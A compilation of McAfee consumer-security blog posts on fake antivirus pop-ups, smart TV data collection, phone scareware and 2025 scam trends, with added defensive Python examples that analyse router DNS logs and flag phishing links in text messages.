    Your Mac experience should be enjoyable and secure. With the right awareness and tools, it absolutely can be, especially when you know what to look for and follow the right practices. By recognizing the warning signs of fake antivirus pop-ups, downloading software only from trusted sources, keeping your macOS and applications updated, and following the prevention tips outlined above, you can avoid falling victim to these fake antivirus scams.

    Remember that legitimate security alerts from Apple come through System Preferences and official macOS notifications, not through alarming browser pop-ups demanding immediate payment or phone calls. Use reputable security tools from a trusted vendor, such as McAfee, that provide real-time protection and regular updates about emerging threats.

    Share these tips with your family and friends, especially those who might be less tech-savvy and more vulnerable to these deceptive tactics. The more people understand how fake antivirus schemes operate, the safer our entire digital community is.

    The post Stop Fake Antivirus Popups on Your Mac appeared first on McAfee Blog.

    How To Tell If Your Smart TV Is Spying on You

    By: McAfee

    From their original design as simple broadcast receivers, today’s televisions have evolved into powerful, internet-connected entertainment hubs. Combining traditional viewing with online capabilities, smart TVs provide instant access to streaming platforms, web browsing, voice assistants, and personalized recommendations. 

    As our TVs have grown smarter, however, they’ve also become gateways to new privacy and security challenges. In a chilling echo of George Orwell’s dystopian novel 1984, it’s possible that Big Brother, or in this case, Big Hacker, might be surveilling you through your own television.

    In 2013, evidence emerged that smart TVs can be just as vulnerable to hacking as home computers, following an investigation by security analysts Aaron Grattafiori and Josh Yavor at iSEC Partners. Working with smart TV manufacturers to address potential vulnerabilities, the analysts presented their findings at the Black Hat network security conference in Las Vegas. Their demonstration highlighted the concerning possibility of smart TVs not only physically surveilling you through the built-in camera but also prying deeper into your personal life by collecting data on your web searches, app usage, and preferences.

    Smart TV hacking entry points

    Smart TVs can be hacked in several ways, but the gateway that opens your smart TV to these attacks is the IP address, which links with internet-driven apps such as Facebook and YouTube, as well as video streaming services, microphones, and even internal cameras. Because smart TVs often run the same code as computers and smartphones, such as JavaScript or HTML5, they are also susceptible to malware and spyware attacks. These are some of the ways your device can be hacked:

    • Outdated firmware: When you don’t regularly update your TV’s software, you leave known security holes wide open for cybercriminals to enter. These updates often include security patches, but many users ignore update notifications.
    • Unsecure downloads or sideloads: When you download apps from unofficial sources or use older apps with poor security, you invite malware into your living room. Additionally, weak Wi-Fi settings at home create an opening for hackers to access not just your TV but your entire network.
    • Weak login habits: Reusing the same password across accounts lets criminals access your smart TV once they’ve compromised your other accounts. Smart TVs could even have background services you might not know about, creating additional attack points.
    • Compromised physical connections: Infected HDMI devices or USB drives could introduce malware into your system. Once hackers gain access to your smart TV, they can use it to move through your home network and other connected devices.

    Spying beyond physical surveillance

    Once a hacker has compromised your smart TV, they can spy on you through several built-in technologies that collect data on your viewing habits, conversations, and online activities.

    • Automatic Content Recognition (ACR): This is a common spying method that analyzes audio or video snippets from your content. It then packages and sells this data to advertisers, who use it to create profiles of your entertainment preferences for customized advertising. 
    • Voice assistants and listening microphones: Many smart TVs include voice control features that activate when you say specific wake words. These microphones can capture private conversations, even when the TV is “off” and on standby mode. This data could be processed by third-party voice recognition services, creating potential eavesdropping risks.
    • Built-in or plug-in cameras: These enable video calling and gesture control features, but they also create opportunities for unauthorized surveillance and privacy vulnerabilities. Smart TVs with cameras could be accessed by hackers or malicious software.
    • App-level tracking and advertising IDs: Similar to smartphone apps, smart TV apps also collect data on your usage and preferences through unique advertising identifiers, which build comprehensive profiles for targeted marketing. Your Netflix viewing habits might influence ads you see on YouTube or other platforms.
    • Data sharing with third parties: TV manufacturers often share collected data with advertising networks, content providers, and data brokers to create extensive digital profiles. This information can include viewing schedules, app usage, voice recordings, and even household demographic insights.
    • Privacy settings: Most smart TVs offer settings to disable ACR, limit voice recording, and opt out of personalized advertising. Look for “Privacy,” “Viewing Data,” or “Interest-Based Advertising” options in your TV’s settings menu. However, these settings may reset after software updates.
    • Network behaviors: Your smart TV communicates with various servers, sending viewing data, software telemetry, and usage statistics even when you’re not actively using smart features. Router logs often show smart TVs making hundreds of network connections per day to advertising and analytics services.

    The key to managing these privacy risks is understanding what data your TV collects and taking control through privacy settings, network restrictions, and informed usage decisions. 

    Types of data that smart TVs collect

    • Viewing history, content preferences, and navigation patterns: Your smart TV tracks what shows, movies, and channels you watch, how long you view them, and when you pause or skip content. This data helps TV manufacturers and streaming app providers understand your entertainment preferences and suggest personalized content.
    • Device identifiers and technical data: Your TV collects unique device identifiers, IP addresses, Wi-Fi network information, and technical specifications. In turn, manufacturers use this data for device management, software updates, and to link your viewing activity across different sessions and devices.
    • Advertising IDs and marketing data: Smart TVs generate unique advertising identifiers that track your activity for targeted advertising. Third-party advertisers and data brokers use these IDs to build detailed profiles for marketing campaigns and to measure ad effectiveness across different platforms.
    • Voice recordings and search queries: Your voice commands or searches are recorded and processed by the manufacturer’s servers or third-party speech-recognition services to improve voice-recognition accuracy and deliver search results.
    • Geolocation and network information: Your smart TV can determine your approximate location through your IP address and Wi-Fi network details. This geographic data helps content providers offer region-specific programming and advertising.
    • Diagnostic and performance data: Smart TVs collect technical performance metrics, error logs, and usage statistics to help manufacturers and software partners identify issues, improve software performance, and develop new features. 

    Take control of your data

    Your smart TV data typically flows to multiple parties. It starts with the device manufacturer for product improvements, then to streaming app providers for content recommendations, on to advertising networks for targeted marketing, and analytics companies for usage insights. Recent regulatory guidance emphasizes that you should have clear visibility into these data-sharing relationships through your TV’s privacy policy.

    You can limit data collection by disabling Automatic Content Recognition (ACR) in your TV’s privacy settings, turning off personalized advertising, and regularly reviewing app permissions. Consumer protection agencies require smart TV manufacturers to provide opt-out mechanisms for advertising personalization and data sharing with third parties.

    Stop the spying

    Fortunately, you can significantly reduce your smart TV risks with some simple preventive measures:

    1. Check your TV’s privacy and ACR settings: Navigate to your smart TV’s settings menu and look for privacy, data collection, or “Automatic Content Recognition” (ACR) options, and disable or limit that function to prevent the tracking of your viewing behaviors and preferences. 
    2. Review consent prompts after software updates: When you see pop-ups asking for consent to new terms, take a moment to read what you’re agreeing to. You can often decline optional data sharing while keeping essential functionality.
    3. Monitor your ad personalization settings: Look for advertising or marketing preferences in your settings menu, and opt out of personalized advertising to reduce the data collected about your viewing patterns.
    4. Audit app permissions and microphone access: Smart TV apps may request access to features such as your microphone, camera, or network information. Review which apps have these permissions. Voice assistants and video calling apps may need microphone access, but streaming apps typically don’t require these sensitive permissions.
    5. Monitor network activity: Check your router’s device list to see if your smart TV is unusually chatty with unknown servers. Many modern routers also offer parental controls or privacy features that can limit your TV’s internet access to only essential functions.
    6. Perform security audits on major platforms: Roku, Samsung Tizen, LG webOS, and Android TV each offer basic privacy controls in their main settings. Look for “Privacy,” “Ads,” “Data Collection,” or “Viewing Information” to take control regardless of your TV model.
    7. Check for physical indicators and hardware controls: Many newer smart TV models don’t include cameras, but if yours does, you’ll often find a physical privacy shutter or the ability to disable it in settings. For voice features, look for microphone mute buttons on your remote or TV itself.
    8. Stay updated: Ensure your apps are updated regularly to maintain the security of your TV and its apps. The digital world is full of bugs waiting for a chance to invade your device, so don’t let outdated apps provide them the perfect entry point. 
    9. Use social media sparingly: Social media sites are notorious hunting grounds for identity thieves. Restrict the use of these apps to your computer, smartphone, or tablet, and ensure they have comprehensive security protection to guard your devices, identity, and data.

    Standby versus fully off

    Most smart TVs don’t fully turn off when you press the power button; they enter standby mode to enable quick startup. In this state, certain components may remain active and continue collecting data. The TV might maintain network connectivity to receive software updates, keep microphones and voice assistants ready to respond to wake words, or continue ACR that tracks your viewing habits.

    To truly disconnect your TV from potential monitoring, you have several options:

    1. Look for a physical mute switch on your remote or TV for the microphone. This provides a hardware-level disconnect that software can’t override.
    2. You can unplug your TV entirely when not in use or connect it to a power strip that you can easily switch off to cut all power.
    3. For a more permanent solution, dive into your TV’s privacy settings to disable ACR tracking, turn off voice activation features, and restrict background data collection. 
    4. You can also disconnect your TV from Wi-Fi entirely if you primarily use external streaming devices, which gives you more control over what data gets shared.
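Step 5 of “Stop the spying” suggests checking whether the TV is unusually chatty, and the standby section explains why lookups keep happening while the set is “off”. The following is an added example, not code from the McAfee post: it reads dnsmasq-style DNS query lines (the format many home routers and Pi-hole write) and, for one device’s IP, reports which domains it resolves most and what share of its lookups fall inside a chosen “TV off” window. The log lines, addresses and domain names are constructed; the 01:00–06:00 window is an assumed default.

```python
"""Per-device DNS summary from a home router log, to see what a smart TV talks to.

Added example, not code from the McAfee post. Input is dnsmasq-style query logging
("query[A] host from client"); the sample lines, IPs and domains below are constructed.
"""
import re
from collections import Counter
from datetime import time

# Matches the query lines dnsmasq/Pi-hole write; reply and cache lines are ignored.
QUERY_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) .*?"
    r"query\[(?P<qtype>[A-Z]+)\] (?P<name>\S+) from (?P<client>\S+)$"
)


def parse_queries(lines):
    """Yield (client, lowercase name, time-of-day) for every query line; skip the rest."""
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m:
            hh, mm, ss = (int(x) for x in m["time"].split(":"))
            yield m["client"], m["name"].lower().rstrip("."), time(hh, mm, ss)


def base_domain(name):
    """Group hostnames by their last two labels (good enough for a living-room audit)."""
    parts = name.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name


def device_report(lines, client, off_start=time(1, 0), off_end=time(6, 0)):
    """Summarize one device: total lookups, lookups inside the 'TV off' window, domains."""
    domains = Counter()
    total = off_hours = 0
    for c, name, t in parse_queries(lines):
        if c != client:
            continue
        total += 1
        domains[base_domain(name)] += 1
        if off_start <= t < off_end:
            off_hours += 1
    share = off_hours / total if total else 0.0
    return {"total": total, "off_hours": off_hours, "off_hours_share": share, "domains": domains}


# Constructed sample: one evening of viewing, then the TV in standby overnight.
# 192.168.1.42 is the TV, 192.168.1.20 is a laptop on the same network.
SAMPLE_LOG = """\
Jan 12 20:01:03 dnsmasq[712]: query[A] api.streaming-app.example from 192.168.1.42
Jan 12 20:01:04 dnsmasq[712]: reply api.streaming-app.example is 203.0.113.10
Jan 12 20:01:09 dnsmasq[712]: query[A] acr.tv-vendor.example from 192.168.1.42
Jan 12 20:03:41 dnsmasq[712]: query[A] ads.adnet.example from 192.168.1.42
Jan 12 21:15:00 dnsmasq[712]: query[A] mail.example.net from 192.168.1.20
Jan 13 02:10:07 dnsmasq[712]: query[A] acr.tv-vendor.example from 192.168.1.42
Jan 13 02:10:08 dnsmasq[712]: query[A] telemetry.tv-vendor.example from 192.168.1.42
Jan 13 03:40:12 dnsmasq[712]: query[A] ads.adnet.example from 192.168.1.42
Jan 13 05:59:59 dnsmasq[712]: query[AAAA] ads.adnet.example from 192.168.1.42
""".splitlines()

if __name__ == "__main__":
    report = device_report(SAMPLE_LOG, "192.168.1.42")
    print(f"lookups: {report['total']}, during 'off' window: {report['off_hours']} "
          f"({report['off_hours_share']:.0%})")
    for domain, count in report["domains"].most_common():
        print(f"  {count:3}  {domain}")
```

A high off-hours share for a TV that is supposedly switched off is the signal that the standby settings, ACR toggle or a power-strip cutoff deserve attention.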

    FAQs about Smart TVs

    Do all smart TVs have cameras?

    It depends on your specific smart TV model and its manufacturing date. Most modern smart TVs manufactured after 2022 do not include built-in cameras. Major manufacturers such as Samsung, LG, Sony, and TCL have largely moved away from integrating cameras directly into their television sets due to privacy concerns and limited consumer adoption. 

    Some premium models and older smart TVs from 2018-2021 may still feature built-in cameras, typically used for:

    • Video calling: Apps such as Zoom or Google Meet allow you to make calls from your TV
    • Gesture control: Hand movements enable you to navigate menus and control functions 
    • Facial recognition: Based on who is watching, smart TVs can personalize content recommendations
    • Voice assistant integration: Some cameras work with microphones to enhance smart assistant features

    If your smart TV does have a camera, you still have control, as most smart TVs with cameras include physical privacy shutters, software controls to disable the camera, or the option to cover the lens. For external USB cameras, simply unplugging it ensures that no one can see you through the smart TV.

    How do I know if my smart TV has a camera?

    To determine if your smart TV has a camera, check the following:

1. The physical TV: Check the top, bottom, and side edges of your TV screen for a small, dark, circular lens. Built-in cameras typically sit on the top bezel or retract into the frame.
    2. Quick detection test: In a dimly lit room, shine a flashlight across your TV’s bezel while looking for reflective surfaces. Camera lenses will reflect light differently than the surrounding plastic, appearing as small, glassy circles that catch and reflect the light beam.
    3. Camera shutter or privacy cover: TVs with built-in cameras often include a sliding privacy shutter or removable cover. Look for a small plastic piece that can slide over the camera lens area, or a hinged cover that flips up and down.
    4. User manual: Your manual will clearly list the camera functionality if it is present. You can also find detailed specs on the product packaging. Look for terms such as “built-in camera,” “video calling,” or “gesture control” in the feature list.
    5. Manufacturer’s website: Visit your TV manufacturer’s official support page and enter your exact model number. The detailed product specifications should confirm whether your model includes camera hardware.
    6. Camera-related settings: Go to your smart TV’s main settings menu and look for sections labeled “Camera,” “Privacy,” “Microphone,” or “Gesture Control.” If these options exist, your TV likely has camera capability. Many TV models from 2023 include dedicated privacy toggles that let you fully disable camera functions.

    If you discover your smart TV has a camera, you can take control of your privacy by disabling it in your TV’s settings, covering it with tape when not in use, or using any built-in privacy shutters.

    How can I disable or manage my smart TV camera?

    Aside from the precautions listed above, there are other ways you can disable your smart TV’s camera:

    • Privacy settings: Navigate to your smart TV’s Settings menu, then look for “Privacy,” “Security,” or “Camera” options. Most modern TVs group these controls together to limit the data your device collects and shares.
    • Specific apps: Review which apps have camera permissions by going to Settings > Apps > [App Name] > Permissions. Turn off camera access for apps that don’t need it, like streaming services or games. Video calling apps will need camera access to function properly.
    • Gesture and voice control: Disable motion-sensing and voice-recognition features in your TV’s accessibility or interaction settings, as these features often require the camera and microphone to be active.
    • System update resets: Smart TV updates can sometimes reset your privacy settings to defaults. After each update, take a few minutes to verify your camera and microphone settings remain off as you configured them.
    • Network-level protection: For tech-savvy users, consider setting up router-level controls to monitor or restrict your smart TV’s internet connections. Some routers allow you to block specific domains or limit device communication, adding another layer of control over what data your TV can share.
    • Automatic security updates: Keep your smart TV’s firmware up to date by enabling automatic updates. Manufacturers regularly release security patches that address vulnerabilities to protect you from potential threats.
    • Dedicated guest network: Consider connecting your smart TV to a separate Wi-Fi network from your main devices. This limits potential access to other connected devices in your home if your TV’s security is ever compromised.
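As an added example of the router-level monitoring mentioned above (this is not code from the original post), the following Python script summarises which domains a single device resolves by parsing dnsmasq-style DNS query logs, the format that Pi-hole and many home routers write. The log lines are constructed, the TV’s address 192.168.1.50 and the vendor hostnames are assumptions, and the block lines it emits use dnsmasq’s address=/name/0.0.0.0 syntax so you can sink a telemetry hostname at the router once you have seen it in the log.

```python
"""Summarise which domains one LAN device resolves, from dnsmasq-style query
logs (the format Pi-hole and many home routers write).

Added example; not McAfee's code. The log lines and hostnames below are
constructed for illustration, and 192.168.1.50 is an assumed TV address.
"""
import re
from collections import Counter

# dnsmasq log line: "... dnsmasq[pid]: query[A] host.example.com from 192.168.1.50"
QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<src>\S+)")

SAMPLE_LOG = """\
Jan 10 20:01:02 dnsmasq[812]: query[A] time.example-tv-vendor.com from 192.168.1.50
Jan 10 20:01:02 dnsmasq[812]: query[A] acr-telemetry.example-tv-vendor.com from 192.168.1.50
Jan 10 20:01:03 dnsmasq[812]: query[AAAA] acr-telemetry.example-tv-vendor.com from 192.168.1.50
Jan 10 20:01:05 dnsmasq[812]: query[A] cdn.streaming.example from 192.168.1.50
Jan 10 20:01:06 dnsmasq[812]: query[A] mail.example.org from 192.168.1.20
Jan 10 20:03:10 dnsmasq[812]: query[A] acr-telemetry.example-tv-vendor.com from 192.168.1.50
Jan 10 20:05:00 dnsmasq[812]: not a query line
"""

def parse_queries(log_text):
    """Yield (qtype, name, source_ip) for each query line; other lines are skipped."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("qtype"), m.group("name").lower().rstrip("."), m.group("src")

def domains_for_device(log_text, device_ip):
    """Count the names queried by one device (give the TV a DHCP reservation so
    its address stays fixed)."""
    counts = Counter()
    for _qtype, name, src in parse_queries(log_text):
        if src == device_ip:
            counts[name] += 1
    return counts

def registrable_domain(name):
    """Last two labels. Crude (wrong for co.uk-style suffixes) but enough for grouping."""
    parts = name.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name

def report(log_text, device_ip):
    """Per-hostname and per-site query counts for one device."""
    hosts = domains_for_device(log_text, device_ip)
    sites = Counter()
    for name, n in hosts.items():
        sites[registrable_domain(name)] += n
    return {"hosts": hosts, "sites": sites}

def dnsmasq_block_lines(names):
    """dnsmasq config lines that answer the given names with 0.0.0.0."""
    return [f"address=/{n}/0.0.0.0" for n in sorted(set(names))]

if __name__ == "__main__":
    r = report(SAMPLE_LOG, "192.168.1.50")
    for host, n in r["hosts"].most_common():
        print(f"{n:4d}  {host}")
    print("\n".join(dnsmasq_block_lines(["acr-telemetry.example-tv-vendor.com"])))
```

Run it against your own router’s log (on Pi-hole, /var/log/pihole.log) with the TV’s address to see what it talks to while idle; a hostname that is queried every few minutes while the screen is off is the one to investigate before you block it, since blocking the wrong name can break updates or streaming apps.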

    Final thoughts

    If the thought of your living room turning into a hacker’s surveillance paradise sends a chill down your spine, you’re not alone. Fortunately, you can take some protective measures that keep your smart TV safe.

    One of the best ways to protect yourself is to stay informed about the latest developments in smart TV security. Attend webinars, read articles, and follow experts in the field to stay current with the latest security threats and fixes. 

    Just as importantly, small but effective digital habits will also fortify your smart TV security: keep your TV’s firmware updated, stick to official app stores, secure your home Wi-Fi with strong encryption, use unique passwords for your devices, limit the use of social media and messaging apps on your TV, and be cautious about what you plug into your TV’s ports. 

    By following these recommendations, you can continue to relax in your living room and enjoy your digital entertainment experience without compromising your privacy and security.

    The post How To Tell If Your Smart TV Spying on You appeared first on McAfee Blog.

    Black or Scrambled Phone Screen? Here’s How to Spot a Hacked vs Broken Phone

    By: McAfee

    It’s the screen you never want to see.

    Something is seriously wrong with your phone. Or is it? You might not have a broken phone at all. Instead, you might have a hacked phone.

(Image: a scareware screen, an attack that frightens you into thinking your device is broken or infected with a virus. Source: Mobile Hacker)

    What you see above is a form of scareware, an attack that frightens you into thinking your device is broken or infected with a virus. What the hacker wants you to do next is panic. They want you to tap on a bogus link that says it’ll run a security check, remove a virus, or otherwise fix your phone before the problem gets worse.

    Of course, tapping that link takes you to a malware or phishing site, where the hacker takes the next step and installs an even nastier form of malware on your phone. In other cases, they steal your personal info under the guise of a virus removal service. (And yes, sometimes they pose as McAfee when they pull that move. In fact,

    Note that in this example above, the hacker behind the phony broken screen is arguably going for a user who’s perhaps less tech savvy. After all, the message atop the “broken” screen appears clear as day. Still, in the heat of the moment, it can be convincing enough.

    How does scareware get on phones?

    Scareware typically finds its way onto phones through misleading ads, fake security alerts, or hacked websites. In other cases, downloading apps from places other than an official app store can lead to scareware (and other forms of malware too).

    As for malware on phones, you’ll find different risk levels between Android and iOS phones. While neither platform is completely immune to threats, Android phones are reportedly more susceptible to viruses than iPhones due to differences in their app downloading policies. On Android phones, you can install apps from third-party sources outside the official Google Play Store, which increases the risk of downloading malicious software.

    In contrast, Apple restricts app installations to its official App Store, making it harder for malware to get on iOS devices. (That’s if you haven’t taken steps to jailbreak your iPhone, which removes the software restrictions imposed by Apple on its iOS operating system. We absolutely don’t recommend jailbreaking because it may void warranties and make it easier for malware, including scareware, to end up on your phone.)

    If you think you’ve wound up with a case of scareware, stay calm. The first thing the hacker wants you to do is panic and click that link. Let’s go over the steps you can take.

    How to remove malware from your Android phone

    If you don’t already have mobile security and antivirus for your phone, your best bet is to get the latest virus removal guidance from Android, which you can find on this help page.

    Moving forward, you can get protection that helps you detect and steer clear of potential threats as you use your phone. You can pick up McAfee Security: Antivirus VPN in the Google Play store, which also includes our Scam Detector and Identity Monitoring. You can also get it as part of your McAfee+

    How to remove malware from your iPhone

    Step 1: Restart your phone

    Hold down the iPhone power button until you see slide to power off on your screen. Slide it, wait for the phone to power down, and then press the power button to restart your iPhone.

    Step 2: Download updates 

Having the latest version of iOS on your phone ensures you have the best protection in place. Open the Settings app, go to General, and select Software Update. Tap Download and Install to get the latest iPhone update.

    Step 3: Delete suspicious apps 

Press and hold a suspicious app icon on your screen until the Remove App option appears. Remove it and repeat as needed for any other suspicious apps.

    More steps you can take …

    If those steps don’t take care of the issue, there are two stronger steps you can take. The first involves restoring your phone from a backup as described by Apple here.

    The most aggressive step you can take is to reset your phone entirely. You can return it to the original factory settings (with the option to keep your content) by following the steps in this help article from Apple.

    How to avoid malware on your phone

    Clearly these attacks play on fear that one of the most important devices in your life has a problem—your phone.

    1. Protect your phone.

    Comprehensive online protection software can secure your phone in the same ways that it secures your laptops and computers. Installing it can protect your privacy, keep you safe from attacks on public Wi-Fi, automatically block unsafe websites and links, and detect scams, just to name a few things it can do.

2. Update your phone’s operating system.

    Along with installing security software, keeping your phone’s operating system up to date can greatly improve your security. Updates can fix vulnerabilities that hackers rely on to pull off their malware-based attacks. It’s another tried-and-true method of keeping yourself safe—and for keeping your phone running great too.

3. Avoid third-party app stores.

    Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, Google and Apple are quick to remove malicious apps from their stores when discovered, making shopping there safer still.

    The post Black or Scrambled Phone Screen? Here’s How to Spot a Hacked vs Broken Phone appeared first on McAfee Blog.

    This Year in Scams: A 2025 Retrospective, and a Look Ahead at 2026

    By: McAfee

The Top Scams of 2025

    They came by phone, by text, by email, and they even weaseled their way into people’s love lives—an entire host of scams that we covered here in our blogs throughout the year.

    Today, we look back, picking five noteworthy scams that firmly established new trends, along with one in particular that gives us a hint at the face of scams to come.

    Let’s start it off with one scam that pinged plenty of phones over the spring and summer: those toll road texts.

    1 – The Texts That Jammed Everyone’s Phones: The Toll Road Scam

    It was the hot new scam of 2025 that increased by 900% in one year: the toll road scam.

There’s a good chance you got a few of these this year: scam texts that say you have an unpaid tab for tolls and that you need to pay right away. And as always, they come with a handy link where you can pay up and avoid the threat of a “late fee.”

     

    Of course, links like those took people to phishing sites where people gave scammers their payment info, which led to fraudulent charges on their cards. In some instances, the scammers took it a step further by asking for driver’s license and Social Security numbers, key pieces of info for big-time identity theft.

    Who knows what the hot new text scam for 2026 will be, yet here are several ways you can stop text scams in their tracks, no matter what form they take:

    How Can I Stop Text Scams?

    Don’t click on any links in unexpected texts (or respond to them, either). Scammers want you to react quickly, but it’s best to stop and check it out.

    Check to see if the text is legit. Reach out to the company that apparently contacted you using a phone number or website you know is real—not the info from the text.

Get our Scam Detector. It automatically scans the URLs in your text messages and flags scams. And if you accidentally tap or click a suspicious link, it blocks the risky site.
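To make concrete what “scanning URLs in your text messages” can catch, here is an added example (not McAfee’s Scam Detector and not code from the original post) that pulls links out of a text and scores them against a few cheap heuristics: no HTTPS, a raw IP address as host, a punycode hostname, a link shortener that hides the destination, a brand name such as “ezpass” placed in the subdomain or path while the actual site is something else, and urgency phrases in the message itself. The sample messages, the brand list, the shortener list and the urgency phrases are constructed for illustration, and the registrable-domain logic is a deliberate simplification.

```python
"""Flag suspicious links in text messages with a few cheap heuristics.

Added example, not McAfee's Scam Detector. The sample messages, the brand
list, the shortener list and the urgency phrases are constructed.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"\bhttps?://[^\s<>'\"]+|\bwww\.[^\s<>'\"]+", re.I)

# Brands a toll-road text tends to impersonate; a real tool carries a much larger list.
BRAND_WORDS = ("ezpass", "fastrak", "sunpass", "toll", "dmv", "usps")
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd"}   # illustrative set
URGENCY = ("immediately", "within 24 hours", "final notice", "late fee", "suspended")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def extract_urls(text):
    """Return every link in the text, normalised to start with a scheme."""
    return [u if u.lower().startswith("http") else "http://" + u
            for u in URL_RE.findall(text)]

def registrable_domain(host):
    # Last two labels; crude (misses co.uk-style suffixes) but enough for a demo.
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

def assess_url(url):
    """Reasons this URL looks like phishing; an empty list means nothing was found."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return ["unparseable URL"]
    if parts.scheme != "https":
        reasons.append("not HTTPS")
    if IPV4_RE.match(host):
        reasons.append("raw IP address as host")
    if host.startswith("xn--") or ".xn--" in host:
        reasons.append("punycode (possible lookalike) domain")
    reg = registrable_domain(host)
    if reg in SHORTENERS:
        reasons.append("link shortener hides the real destination")
    # Brand word in the subdomain or path, but not in the site you actually land on.
    sub = host[: -len(reg)] if host.endswith(reg) else host
    sub_and_path = sub + parts.path.lower()
    for brand in BRAND_WORDS:
        if brand in sub_and_path and brand not in reg:
            reasons.append(f"'{brand}' appears in subdomain/path but the site is {reg}")
            break
    if host.count(".") >= 4:
        reasons.append("unusually deep subdomain chain")
    return reasons

def scan_sms(text):
    """Score a message: URL findings plus urgency language. Higher means more suspicious."""
    findings = []
    lowered = text.lower()
    for phrase in URGENCY:
        if phrase in lowered:
            findings.append(f"urgency phrase: '{phrase}'")
    for url in extract_urls(text):
        for reason in assess_url(url):
            findings.append(f"{url}: {reason}")
    return {"score": len(findings), "findings": findings}

SAMPLES = [  # constructed messages
    "EZPass: your account has an unpaid toll. Pay within 24 hours to avoid a late fee: http://ezpass.toll-pay-notice.top/pay",
    "Your package is waiting, confirm at http://192.168.77.4/usps",
    "Dinner at 7? Directions: https://maps.example.com/place/12",
]

if __name__ == "__main__":
    for msg in SAMPLES:
        result = scan_sms(msg)
        print(result["score"], msg[:50])
        for finding in result["findings"]:
            print("   -", finding)
```

The score is a count of independent red flags rather than a verdict; a real detector combines signals like these with reputation data, because a genuine message can trip one heuristic (a shortened link from a company you deal with) while a scam text such as the first sample trips several at once.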

    2 – Romancing the Bot: AI Chatbots and Images Finagle Their Way Into Romance Scams

    It started with a DM. And a few months later, it cost her $1,200.

    Earlier this year, we brought you the story of 25-year-old computer programmer Maggie K. who fell for a romance scam on Instagram. Her story played out like so many. When she and her online boyfriend finally agreed to meet in person, he claimed he missed his flight and needed money to rebook. Desperate to finally see him, she sent the money and never heard from him again.

    But here’s the twist—he wasn’t real in the first place.

    When she reported the scam to police, they determined his images were all made with AI. In Maggie’s words, “That was the scariest part—I had trusted someone who never even existed.”

    Maggie isn’t alone. Our own research earlier this year revealed that more than half (52%) of people have been scammed out of money or pressured to send money or gifts by someone they met online.

    Moreover, we found that scammers have fueled those figures with the use of AI. Of people we surveyed, more than 1 in 4 (26%) said they—or someone they know—have been approached by an AI chatbot posing as a real person on a dating app or social media.

    We expect this trend will only continue, as AI tools make it easier and more efficient to pull off romance scams on an increasingly larger scale.

    Even so, the guidelines for avoiding romance scams remain the same:

    • Never send money to someone you’ve never met in person.
    • Be wary when things move too fast, too soon, such as when the other person starts talking about love almost right away.
    • Be wary when they say they can’t meet in person because they live abroad, often with a story about charity work or military service.
    • Look out for stories of urgent financial need, such as sudden emergencies or requests for help with travel expenses to meet you.
    • Watch out for people who ask for payment in gift cards, crypto, wire transfers, or other forms of payment that are tough to recover. That’s a sign of a scam.

    3 – Paying to Get Paid: The New Job Scam That Raked in Millions

    The job offer sounds simple enough … go online, review products, like videos, or do otherwise simple tasks and get paid doing it—until it’s time to get paid.

    It’s a new breed of job scam that took root this spring, one where victims found themselves “paying to get paid.”

The FTC dubbed these scams “gamified job scams” or “task scams.” Given the way they work, the names fit.

    It starts with a text or direct message from a “recruiter” offering work with the promise of making good money by “liking” or “rating” sets of videos or product images in an app, all with the vague purpose of “product optimization.” With each click, you earn a “commission” and see your “earnings” rack up in the app. You might even get a payout, somewhere between $5 and $20, just to earn your trust.

    Then comes the hook.

    Like a video game, the scammer sweetens the deal by saying the next batch of work can “level up” your earnings. But if you want to claim your “earnings” and book more work, you need to pay up. So you make the deposit, complete the task set, and when you try to get your pay the scammer and your money are gone. It was all fake.

This scam and others like it fall right in line with McAfee data that uncovered a 1,000% spike in job-related scams between May and July, which undoubtedly built on 2024’s record-setting job scam losses of $501 million.

    Whatever form they take, here’s how you can avoid job scams:

    Step one—ignore job offers over text and social media

    A proper recruiter will reach out to you by email or via a job networking site. Moreover, per the FTC, any job that pays you to “like” or “rate” content is against the law. That alone says it’s a scam.

    Step two—look up the company

For job offers in general, look up the company. Check out its background and see whether it matches up with the job being pitched. In the U.S., the Better Business Bureau (BBB) offers a list of businesses you can search.

    Step three—never pay to start a job.

Refuse any request to pay up front, in any form of payment, whether it’s for “training,” “equipment,” or more work. It’s a sign of a scam.

    4 – Seeing is Believing is Out the Window: The Al Roker Deepfake Scam

Prince Harry, Taylor Swift, and now the Today show’s Al Roker have all found themselves cast as the AI-generated spokesperson for deepfake scams.

    In the past, a deepfake Prince Harry pushed bogus investments, while another deepfake of Taylor Swift hawked a phony cookware deal. Then, this spring, a deepfake of Al Roker used his image and voice to promote a bogus hypertension cure—claiming, falsely, that he had suffered “a couple of heart attacks.”

     

The fabricated clip appeared on Facebook and was convincing enough to fool plenty of people, including some of Roker’s own friends. “I’ve had some celebrity friends call because their parents got taken in by it,” said Roker.

    While Meta quickly removed the video from Facebook after being contacted by TODAY, the damage was done. The incident highlights a growing concern in the digital age: how easy it is to create—and believe—convincing deepfakes.

    Roker put it plainly, “We used to say, ‘Seeing is believing.’ Well, that’s kind of out the window now.”

In all, this stands as a good reminder to be skeptical of celebrity endorsements on social media. If a public figure fronts an apparent deal for an investment, cookware, or a hypertension “cure” in your feed, think twice. And better yet, let our Scam Detector help you spot what’s real and what’s fake out there.

    5 – September 2025: The First Agentic AI Attack Spotted in The Wild

    And to close things out, a look at some recent news, which also serves as a look ahead.

Last September, researchers spotted something not seen before: a cyberattack almost entirely run by agentic AI.

    What is Agentic AI?

Definition: Artificial intelligence systems that can independently plan, make decisions, and work toward specific goals with minimal human intervention, executing complex tasks by adapting to new information and situations on their own.

